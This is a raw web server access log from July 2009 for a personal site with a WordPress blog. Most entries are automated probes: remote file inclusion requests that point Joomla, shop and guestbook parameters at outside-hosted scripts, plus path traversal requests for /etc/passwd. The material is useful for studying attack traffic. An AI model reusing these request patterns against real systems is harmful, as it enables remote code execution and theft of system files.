94.23.2.21 - - [26/Jul/2009:09:19:12 -0700] "GET /logs/access_080323.log/index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.2.21 - - [26/Jul/2009:09:19:12 -0700] "GET /logs/index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.2.21 - - [26/Jul/2009:09:19:12 -0700] "GET /logs/access_080323.log/index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.2.21 - - [26/Jul/2009:09:19:13 -0700] "GET /logs/index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [26/Jul/2009:09:19:14 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.41 - - [26/Jul/2009:09:19:14 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
130.235.148.242 - - [26/Jul/2009:09:19:16 -0700] "GET //index.php?cmd&file=http://aboutav.com//id1.txt??? HTTP/1.1" 200 20995 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.2.21 - - [26/Jul/2009:09:19:21 -0700] "GET /logs/access_080323.log%20%20/index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.2.21 - - [26/Jul/2009:09:19:21 -0700] "GET /logs/index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.2.21 - - [26/Jul/2009:09:19:21 -0700] "GET /logs/access_080323.log%20%20/index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.2.21 - - [26/Jul/2009:09:19:21 -0700] "GET /logs/index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [26/Jul/2009:09:19:22 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
94.23.2.21 - - [26/Jul/2009:09:19:22 -0700] "GET /logs/access_080215.log/index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.2.21 - - [26/Jul/2009:09:19:22 -0700] "GET /logs/access_080215.log/index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.2.21 - - [26/Jul/2009:09:19:34 -0700] "GET /index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt???? HTTP/1.1" 200 21078 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [26/Jul/2009:09:19:35 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
94.23.2.21 - - [26/Jul/2009:09:19:35 -0700] "GET /index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt???? HTTP/1.1" 200 21078 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.2.21 - - [26/Jul/2009:09:19:36 -0700] "GET /index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt???? HTTP/1.1" 200 21078 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.2.21 - - [26/Jul/2009:09:19:44 -0700] "GET /index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt???? HTTP/1.1" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.2.21 - - [26/Jul/2009:09:19:50 -0700] "GET /logs/access_080215.log%20%20/index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.2.21 - - [26/Jul/2009:09:19:50 -0700] "GET /logs/access_080215.log%20%20/index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.152.243.103 - - [26/Jul/2009:09:20:32 -0700] "GET /////shop/main.php?_shop_path=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.152.243.103 - - [26/Jul/2009:09:20:32 -0700] "GET /logs/access_090318.log//////shop/main.php?_shop_path=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.152.243.103 - - [26/Jul/2009:09:20:38 -0700] "GET /logs/access_090520.log//////shop/main.php?_shop_path=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.2.21 - - [26/Jul/2009:09:21:25 -0700] "GET /logs/access_080323.log/index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.2.21 - - [26/Jul/2009:09:21:25 -0700] "GET /logs/index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [26/Jul/2009:09:21:27 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
80.152.243.103 - - [26/Jul/2009:09:21:31 -0700] "GET /////shop/main.php?_shop_path=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.152.243.103 - - [26/Jul/2009:09:21:31 -0700] "GET /logs//////shop/main.php?_shop_path=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.2.21 - - [26/Jul/2009:09:21:31 -0700] "GET /logs/access_080323.log/index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.152.243.103 - - [26/Jul/2009:09:21:31 -0700] "GET /logs/access_090318.log//////shop/main.php?_shop_path=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.2.21 - - [26/Jul/2009:09:21:31 -0700] "GET /logs/index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [26/Jul/2009:09:21:31 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
94.23.2.21 - - [26/Jul/2009:09:21:34 -0700] "GET /logs/access_080215.log/index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.2.21 - - [26/Jul/2009:09:21:40 -0700] "GET /logs/access_080215.log/index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:09:21:40 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:09:21:40 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:09:21:40 -0700] "GET /logs/access_080726.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:09:21:40 -0700] "GET /logs/access_080627.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.2.21 - - [26/Jul/2009:09:21:42 -0700] "GET /index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt???? HTTP/1.1" 200 21078 "-" "Mozilla/5.0" "www.dmulk.com"
195.210.57.83 - - [26/Jul/2009:09:21:43 -0700] "GET /robots.txt HTTP/1.0" 200 36 "-" "Mozilla/5.0 (compatible; KaloogaBot; http://www.kalooga.com/info.html?page=crawler)" "www.dmulk.com"
195.210.57.83 - - [26/Jul/2009:09:21:43 -0700] "GET /logs/access_080127.log HTTP/1.0" 200 672308 "-" "Mozilla/5.0 (compatible; KaloogaBot; http://www.kalooga.com/info.html?page=crawler)" "www.dmulk.com"
94.23.2.21 - - [26/Jul/2009:09:21:46 -0700] "GET /index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt???? HTTP/1.1" 200 21078 "-" "Mozilla/5.0" "www.dmulk.com"
80.152.243.103 - - [26/Jul/2009:09:22:00 -0700] "GET /logs/access_090520.log//////shop/main.php?_shop_path=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.2.21 - - [26/Jul/2009:09:22:02 -0700] "GET /logs/access_080323.log/index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.2.21 - - [26/Jul/2009:09:22:02 -0700] "GET /logs/index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [26/Jul/2009:09:22:03 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
94.23.2.21 - - [26/Jul/2009:09:22:03 -0700] "GET /logs/access_080323.log/index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.2.21 - - [26/Jul/2009:09:22:03 -0700] "GET /logs/index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [26/Jul/2009:09:22:04 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
94.23.2.21 - - [26/Jul/2009:09:22:17 -0700] "GET /index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt???? HTTP/1.1" 200 21078 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.2.21 - - [26/Jul/2009:09:22:18 -0700] "GET /index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt???? HTTP/1.1" 200 21078 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.2.21 - - [26/Jul/2009:09:22:32 -0700] "GET /logs/access_080215.log/index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
94.23.2.21 - - [26/Jul/2009:09:22:34 -0700] "GET /logs/access_080215.log/index.php?option=com_comprofiler&Itemid=&mosConfig_absolute_path=http://www.phoxlab.com.br//xmlrpc/includes/fx29id.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
206.212.240.168 - - [26/Jul/2009:09:23:20 -0700] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/ HTTP/1.0" 200 14634 "http://dmulk.com/blog/2008/06/07/westoc-2008-preparation-thank-you-byron/" "Opera/7.11 (Windows NT 5.1; U) [en]" "dmulk.com"
206.212.240.168 - - [26/Jul/2009:09:23:21 -0700] "POST /blog/wp-comments-post.php HTTP/1.0" 500 1214 "http://dmulk.com/blog/2008/06/07/westoc-2008-preparation-thank-you-byron/" "Opera/7.11 (Windows NT 5.1; U) [en]" "dmulk.com"
87.20.186.139 - - [26/Jul/2009:09:23:27 -0700] "GET /logs/access_080619.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.51.115 - - [26/Jul/2009:09:25:14 -0700] "GET /admin.php?cal_dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:09:25:37 -0700] "GET /logs/access_080726.log%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.20.186.139 - - [26/Jul/2009:09:25:37 -0700] "GET /logs/access_080627.log%20%20/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.baab.it/roxa/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:25:48 -0700] "GET /logs/access_071219.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:25:48 -0700] "GET /logs/access_071219.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:25:48 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:25:48 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:25:49 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 200 50 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:25:49 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 200 50 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:25:49 -0700] "GET /logs/access_071219.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:25:49 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:25:49 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 200 50 "-" "Mozilla/5.0" "www.dmulk.com"
210.120.128.65 - - [26/Jul/2009:09:25:52 -0700] "GET /logs/access_080322.log/////////?cmd&file=http://www.fusionc.com/_private/id.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [26/Jul/2009:09:25:53 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
210.120.128.65 - - [26/Jul/2009:09:25:53 -0700] "GET /logs/////////?cmd&file=http://www.fusionc.com/_private/id.jpg??? HTTP/1.1" 200 110067 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.51.115 - - [26/Jul/2009:09:25:55 -0700] "GET /admin.php?cal_dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.120.128.65 - - [26/Jul/2009:09:26:07 -0700] "GET ////////?cmd&file=http://www.fusionc.com/_private/id.jpg??? HTTP/1.1" 200 21130 "-" "Mozilla/5.0" "www.dmulk.com"
210.120.128.65 - - [26/Jul/2009:09:26:08 -0700] "GET /logs/access_080323.log/////////?cmd&file=http://www.fusionc.com/_private/id.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [26/Jul/2009:09:26:12 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.2; http://dmulk.com/blog" "dmulk.com"
64.157.4.41 - - [26/Jul/2009:09:26:12 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
216.137.102.177 - - [26/Jul/2009:09:26:18 -0700] "GET /logs/access_090415.log%20%20//?_zb_path=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.137.102.177 - - [26/Jul/2009:09:26:19 -0700] "GET /logs//?_zb_path=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 200 110060 "-" "Mozilla/5.0" "www.dmulk.com"
216.137.102.177 - - [26/Jul/2009:09:26:27 -0700] "GET /?_zb_path=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 200 21162 "-" "Mozilla/5.0" "www.dmulk.com"
216.137.102.177 - - [26/Jul/2009:09:26:30 -0700] "GET /logs/access_081026.log%20%20//?_zb_path=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.137.102.177 - - [26/Jul/2009:09:27:08 -0700] "GET /logs/access_081026.log%20%20//?_zb_path=http://www.elatico.cl/components/com_virtuemart/shop_image/stars/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
71.114.7.155 - - [26/Jul/2009:09:28:21 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.1" 200 344118 "http://www.vfrdiscussion.com/forum/lofiversion/index.php/t36984.html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11" "dmulk.com"
190.144.44.36 - - [26/Jul/2009:09:28:31 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [26/Jul/2009:09:28:31 -0700] "GET /logs/access_080327.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [26/Jul/2009:09:28:31 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [26/Jul/2009:09:28:34 -0700] "GET /logs/start.php?pag=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [26/Jul/2009:09:28:34 -0700] "GET /logs/access_080330.log%20%20/start.php?pag=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [26/Jul/2009:09:28:34 -0700] "GET /start.php?pag=http://www.drumzine.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.143.51.115 - - [26/Jul/2009:09:28:59 -0700] "GET /logs/access_080603.log//admin.php?cal_dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.51.115 - - [26/Jul/2009:09:28:59 -0700] "GET /admin.php?cal_dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.51.115 - - [26/Jul/2009:09:28:59 -0700] "GET /logs//admin.php?cal_dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.112.110 - - [26/Jul/2009:09:29:06 -0700] "GET /logs/access_071103.log HTTP/1.0" 200 57650 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:29:45 -0700] "GET /logs/access_071219.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:29:45 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 200 50 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:29:45 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:29:45 -0700] "GET /logs/access_071219.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:29:45 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:29:46 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 200 50 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:29:48 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 200 50 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:29:48 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.43.202.66 - - [26/Jul/2009:09:29:48 -0700] "GET /logs/access_071219.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.solmae.co.kr///receipt/lib/_private/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [26/Jul/2009:09:29:52 -0700] "GET /logs/access_080619.log//include/mail.inc.php?skin_board_path=http://www.aboutav.com//harap/di.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.144.44.36 - - [26/Jul/2009:09:29:52 -0700] "GET /include/mail.inc.php?skin_board_path=http://www.aboutav.com//harap/di.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.144.44.36 - - [26/Jul/2009:09:29:52 -0700] "GET /logs//include/mail.inc.php?skin_board_path=http://www.aboutav.com//harap/di.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.143.51.115 - - [26/Jul/2009:09:30:09 -0700] "GET /logs/access_090315.log//admin.php?cal_dir=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
125.241.54.8 - - [26/Jul/2009:09:30:10 -0700] "GET /components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [26/Jul/2009:09:30:13 -0700] "GET /appserv/main.php?appserv_root=http://www.cisc.at/survey/classes/core/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
125.241.54.8 - - [26/Jul/2009:09:30:13 -0700] "GET /logs/access_080906.log%20%20//components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://www.die-grenzreiter.com/content/download/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [26/Jul/2009:09:30:13 -0700] "GET /logs/access_090112.log%20%20/appserv/main.php?appserv_root=http://www.cisc.at/survey/classes/core/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [26/Jul/2009:09:30:13 -0700] "GET /logs/appserv/main.php?appserv_root=http://www.cisc.at/survey/classes/core/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
